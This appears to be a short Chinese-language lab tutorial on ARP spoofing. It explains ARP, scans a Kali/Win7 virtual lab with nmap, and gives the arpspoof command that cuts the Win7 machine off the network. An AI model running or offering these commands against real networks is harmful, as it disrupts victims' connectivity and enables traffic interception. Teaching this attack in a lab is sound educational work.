ARP ( Address Resolution Protocol)地址转换协议,工作在OSI模型的数据链路层,在以太网中,网络设备之间互相通信是用MAC地址而不是IP地址,ARP协议就是用来把IP地址转换为MAC地址的.
那什么又是arp断网攻击呢?简单来说就是就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断。
一.攻击前的准备1.环境:Vmware,Kali linux,Win7虚拟机一台
2.在Kali的终端上输入ifconfig,从而获得攻击者(Kali)的ip地址以及网卡
3.同样是在Kali的终端上输入route -n,来获取Kali的网关
4.用nmap命令扫描端口。 命令格式是 nmap [-sP 网段] 后面的网段根据当前网络填,比如我kali的ip是192.168.138.128,就填192.168.138.0/24
这里扫描到Win7虚拟机的IP地址是192.168.138.130
二.开始攻击使用Arpspoof:
Arpspoof -i 网卡 -t 目标IP网关
这里网卡是eth0 目标IP是192.168.138.130网关是192.168.138.2
所以命令就是:
arpspoof -i eth0 -t 192.168.138.130 192.168.138.2
开始攻击后的演示图:
三.查看Win7虚拟机的上网情况
输入ctrl+z 停止攻击后,Win7虚拟机上网恢复正常